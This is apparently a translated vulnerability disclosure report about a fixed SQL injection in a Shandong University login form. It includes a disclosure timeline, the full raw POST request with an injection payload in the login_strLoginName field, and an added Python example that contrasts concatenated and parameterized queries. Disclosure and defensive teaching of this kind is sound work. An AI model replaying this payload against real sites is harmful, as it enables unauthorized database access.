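2015-10-16: Details sent to the vendor; awaiting vendor handling
2015-10-16: Vendor confirmed; details disclosed to the vendor only
2015-10-26: Details disclosed to core white hats and experts in the relevant field
2015-11-05: Details disclosed to regular white hats
2015-11-10: Vendor fixed the vulnerability and disclosed it voluntarily; details disclosed to the public
POST-based SQL injection on a Shandong University site
1. A POST-based SQL injection on a Shandong University site (GSP: Canadian Higher Education Foundation Department). URL:
http://gsp.sdu.edu.cn
2. The POST request is as follows: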
POST /bsuims/bsMainFrameInit.do HTTP/1.1
Content-Length: 1297
Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_DJJNLSAJDQ
X-Requested-With: XMLHttpRequest
Referer: http://gsp.sdu.edu.cn
Cookie: JSESSIONID=540EB07FA2B9B3F624DFC51E644A9181
Host: gsp.sdu.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_KBCNEOMLEG

-------AcunetixBoundary_KBCNEOMLEG
Content-Disposition: form-data; name="contextName"

gspmsLoginPage
-------AcunetixBoundary_KBCNEOMLEG
Content-Disposition: form-data; name="contextPara"

null
-------AcunetixBoundary_KBCNEOMLEG
Content-Disposition: form-data; name="contextPath"


-------AcunetixBoundary_KBCNEOMLEG
Content-Disposition: form-data; name="controlType"

frame
-------AcunetixBoundary_KBCNEOMLEG
Content-Disposition: form-data; name="getPasswordAction"

############
-------AcunetixBoundary_KBCNEOMLEG
Content-Disposition: form-data; name="itemName"

loginAction
-------AcunetixBoundary_KBCNEOMLEG
Content-Disposition: form-data; name="loginAction"

######
-------AcunetixBoundary_KBCNEOMLEG
Content-Disposition: form-data; name="login_autoLoginCheckbox"

1
-------AcunetixBoundary_KBCNEOMLEG
Content-Disposition: form-data; name="login_strLoginName"

-1' OR 1=1* AND 000424=000424 or '83izvbDa'='
-------AcunetixBoundary_KBCNEOMLEG
Content-Disposition: form-data; name="login_strPassword"

g00dPa$$w0rD
-------AcunetixBoundary_KBCNEOMLEG
Content-Disposition: form-data; name="registration"

######
-------AcunetixBoundary_KBCNEOMLEG
Content-Disposition: form-data; name="sectionName"

login
-------AcunetixBoundary_KBCNEOMLEG--
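3. The login_strLoginName parameter is the problem:
4. Retrieving the current database and current user:
Filtering... Finding a hole isn't easy, so please give a bit more rank. Thanks!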
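Added example (not part of the original report, and not the site's own code): why the login_strLoginName value above changes the query when it is concatenated into SQL, and why a bound parameter neutralizes it. The table, schema, row and function names are constructed, and sqlite3 stands in for the site's back-end database, which the report does not name.

```python
import sqlite3

# Value of the login_strLoginName field, copied from the POST body in the report.
REPORTED_NAME = "-1' OR 1=1* AND 000424=000424 or '83izvbDa'='"
# Constructed variant: the same value with its '*' character removed.
REPORTED_NAME_NO_STAR = REPORTED_NAME.replace("*", "")


def make_db():
    """In-memory stand-in for the login table (schema and row are constructed)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT PRIMARY KEY, pw_hash TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', 'constructed-hash')")
    return db


def lookup_concatenated(db, name):
    """Anti-pattern: the form field is spliced into the SQL text."""
    sql = "SELECT name FROM users WHERE name = '" + name + "'"
    try:
        return ("rows", db.execute(sql).fetchall())
    except sqlite3.Error as exc:
        # A parse error means the field reached the SQL parser as code.
        return ("sql_error", str(exc))


def lookup_parameterized(db, name):
    """Fix: the field is bound as data and never parsed as SQL."""
    sql = "SELECT name FROM users WHERE name = ?"
    return ("rows", db.execute(sql, (name,)).fetchall())


if __name__ == "__main__":
    db = make_db()
    for value in (REPORTED_NAME, REPORTED_NAME_NO_STAR, "alice"):
        print(repr(value))
        print("  concatenated :", lookup_concatenated(db, value))
        print("  parameterized:", lookup_parameterized(db, value))
```

With concatenation, the reported value either breaks the statement or turns the WHERE clause into a condition that matches every row; with a bound parameter it is just a login name that does not exist.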
Severity: High
Vulnerability Rank: 10
Confirmed: 2015-10-16 22:18
The organization responsible for the system has been notified.
2015-11-10: Fixed